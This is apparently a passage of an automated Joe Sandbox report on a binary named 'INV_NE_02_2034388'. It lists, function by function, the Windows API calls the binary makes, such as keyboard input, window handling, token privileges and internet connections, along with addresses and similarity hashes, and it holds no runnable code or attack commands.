                                          • Instruction Fuzzy Hash: 65315970D402086EFB308AA98C05BFFBBA5AB45718F08826BE491512D2E37DA945975F
                                          APIs
                                          • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00460C66
                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
                                          • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00460D33
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                          • Instruction ID: af81f782b9f2afb763cf5164547ef1363043bc47ca8f91e08b3a13bd089ac861
                                          • Opcode Fuzzy Hash: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                          • Instruction Fuzzy Hash: 963135309402086EFF388B658804BBFBB66EB45310F04472FE481622D1E33D9949D75B
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
                                          • __isleadbyte_l.LIBCMT ref: 00436229
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                          • Instruction ID: a268d3a3e6e94a3a382490fbdf87b59e774afa85b5b6ffc4d13239602402ad5c
                                          • Opcode Fuzzy Hash: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                          • Instruction Fuzzy Hash: 8831E230600246BFDF219F65CC48B6B7BB9BF4A310F17906AE82487291DB34D850D754
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 00484F02
                                            • Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
                                            • Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
                                            • Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669
                                          • GetCaretPos.USER32(?), ref: 00484F13
                                          • ClientToScreen.USER32(00000000,?), ref: 00484F4E
                                          • GetForegroundWindow.USER32 ref: 00484F54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                          • String ID:
                                          • API String ID: 2759813231-0
                                          • Opcode ID: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                          • Instruction ID: 1d2def75fb9c8d520c96e6582531674793c8a8545b0fc50cd96dbe06c6996e1e
                                          • Opcode Fuzzy Hash: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                          • Instruction Fuzzy Hash: 38314FB2D00108AFCB00EFA6C8819EFB7F9EF84304F00446EE515E7242EA759E058BA5
                                          APIs
                                            • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                          • GetCursorPos.USER32(?), ref: 0048C4D2
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
                                          • GetCursorPos.USER32(?), ref: 0048C534
                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                          • String ID:
                                          • API String ID: 2864067406-0
                                          • Opcode ID: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                          • Instruction ID: 2973952025af683afbaf652597196eb0b77ee17814688135882e4792ee887bd6
                                          • Opcode Fuzzy Hash: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                          • Instruction Fuzzy Hash: CE319335500028FFCF159F58C898EAF7BB5EB09310F44486AF9059B361C735AD50DBA8
                                          APIs
                                            • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                            • Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                            • Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                            • Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                            • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
                                          • _memcmp.LIBCMT ref: 004586C6
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
                                          • HeapFree.KERNEL32(00000000), ref: 00458703
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                          • String ID:
                                          • API String ID: 1592001646-0
                                          • Opcode ID: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                          • Instruction ID: 730e04a0c9a28b219d77ec22e6a84493cb1498a8cd35620125a6bebab32f77ad
                                          • Opcode Fuzzy Hash: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                          • Instruction Fuzzy Hash: E4215A71E01109EBDB10DFA4C989BAEB7B8EF45306F15405EE844AB242DB34AE09CB58
                                          APIs
                                          • __setmode.LIBCMT ref: 004209AE
                                            • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                            • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                          • _fprintf.LIBCMT ref: 004209E5
                                          • OutputDebugStringW.KERNEL32(?), ref: 00455DBB
                                            • Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3
                                          • __setmode.LIBCMT ref: 00420A1A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                          • String ID:
                                          • API String ID: 521402451-0
                                          • Opcode ID: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                          • Instruction ID: 506474fa098cb1490a8c63a0929ef03edd2b6c88ff5c0dc42923ee6bdce5b67a
                                          • Opcode Fuzzy Hash: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                          • Instruction Fuzzy Hash: E31126727041146FDB04B2A5BC469BE77A8DF81318FA0416FF105632C3EE3C5946879D
                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004717A3
                                            • Part of subcall function 0047182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0047184C
                                            • Part of subcall function 0047182D: InternetCloseHandle.WININET(00000000), ref: 004718E9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Internet$CloseConnectHandleOpen
                                          • String ID:
                                          • API String ID: 1463438336-0
                                          • Opcode ID: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
                                          • Instruction ID: 71b6e4b1fe2b952a6419c9952bf0f018ffc457c15b1f1ac8131077084853f328
                                          • Opcode Fuzzy Hash: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
                                          • Instruction Fuzzy Hash: 1121C235200601BFEB169F648C01FFBBBA9FF48710F10842FF91996660D775D815A7A9
                                          APIs
                                          • _free.LIBCMT ref: 00435101
                                            • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                            • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                            • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00C50000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AllocateHeap_free
                                          • String ID:
                                          • API String ID: 614378929-0
                                          • Opcode ID: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                          • Instruction ID: 565aca9384bc55ec46628ce6f4316e74187f5c3bb682111b66b5609c454c8c26
                                          • Opcode Fuzzy Hash: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                          • Instruction Fuzzy Hash: D411E072E01A21AECF313FB1BC05B5E3B989B183A5F50593FF9049A250DE3C89418B9C
                                          APIs
                                            • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                            • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                          • gethostbyname.WSOCK32(?,?,?), ref: 00476399
                                          • WSAGetLastError.WSOCK32(00000000), ref: 004763A4
                                          • _memmove.LIBCMT ref: 004763D1
                                          • inet_ntoa.WSOCK32(?), ref: 004763DC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                          • String ID:
                                          • API String ID: 1504782959-0
                                          • Opcode ID: 762733e25637bc439446b3da9c5912462bd92284ca480afd830ba0cdb0608b85
                                          • Instruction ID: c304d0e6e06ed5b692ae79d4b0fe9c52f6c8e6d6f1456e813eafe14ad56adccd
                                          • Opcode Fuzzy Hash: 762733e25637bc439446b3da9c5912462bd92284ca480afd830ba0cdb0608b85
                                          • Instruction Fuzzy Hash: F2114F71600109AFCB00FBA5D946CEE77B9EF04314B54847AF505B72A2DB389E14CB69
                                          APIs
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                          • Instruction ID: 6d6e4feeaee75d02a1ec4dd614e497ad2765f264ac6e3ed00c825e9843e5ba14
                                          • Opcode Fuzzy Hash: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                          • Instruction Fuzzy Hash: 56113A79900218BFDB10DB95C884EAEBB78EB48710F2041A6E900B7250DA716E15DB94
                                          APIs
                                            • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                          • DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                          • GetClientRect.USER32(?,?), ref: 0043B5FB
                                          • GetCursorPos.USER32(?), ref: 0043B605
                                          • ScreenToClient.USER32(?,?), ref: 0043B610
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Client$CursorLongProcRectScreenWindow
                                          • String ID:
                                          • API String ID: 4127811313-0
                                          • Opcode ID: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                          • Instruction ID: ee9d34d9398b5f91fab5137b757b2ab9dbcc007e8162b1c14587a54292e2d527
                                          • Opcode Fuzzy Hash: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                          • Instruction Fuzzy Hash: 39112B39510059FBCB00EF99D8899AE77B8FB05300F4008AAF901F7291D734BA569BA9
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0045D84D
                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0045D864
                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0045D879
                                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0045D897
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Type$Register$FileLoadModuleNameUser
                                          • String ID:
                                          • API String ID: 1352324309-0
                                          • Opcode ID: f854c2ae4ddfb44975126c45fe272911be12f4fa913ee62eb5c826514f2548e5
                                          • Instruction ID: 3b05f8a101c890c8fbc83375acaac98503a8deaba450bce75694a4266b83033e
                                          • Opcode Fuzzy Hash: f854c2ae4ddfb44975126c45fe272911be12f4fa913ee62eb5c826514f2548e5
                                          • Instruction Fuzzy Hash: 48115E75A05304DBE330AF50EC08F97BBBCEF00B01F10896EA926D6151D7B4E94D9BA5
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction ID: 3d94be51af7e819a6a5def82be0e086b27bd99855e7e965629bee2c507946819
                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction Fuzzy Hash: 78014EB244414ABBCF2A5E84CC41CEE3F72BB1C354F599416FA9858131D23AD9B1AB85
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 0048B2E4
                                          • ScreenToClient.USER32(?,?), ref: 0048B2FC
                                          • ScreenToClient.USER32(?,?), ref: 0048B320
                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B33B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ClientRectScreen$InvalidateWindow
                                          • String ID:
                                          • API String ID: 357397906-0
                                          • Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                          • Instruction ID: e0f35f64d62337ec24ef524e52db7040af9c6cc02db1932b8591958b9ea84988
                                          • Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                          • Instruction Fuzzy Hash: B9117775D00209EFDB01DF99C444AEEBBF5FF18310F104566E914E3220D735AA558F94
                                          APIs
                                          • EnterCriticalSection.KERNEL32(?), ref: 00466BE6
                                            • Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9
                                          • _memmove.LIBCMT ref: 00466C09
                                          • _memset.LIBCMT ref: 00466C16
                                          • LeaveCriticalSection.KERNEL32(?), ref: 00466C26
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                          • String ID:
                                          • API String ID: 48991266-0
                                          • Opcode ID: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                          • Instruction ID: 06c116e41b1fbc97defe022da98efa456519ca017efd3746de7cd937a477406a
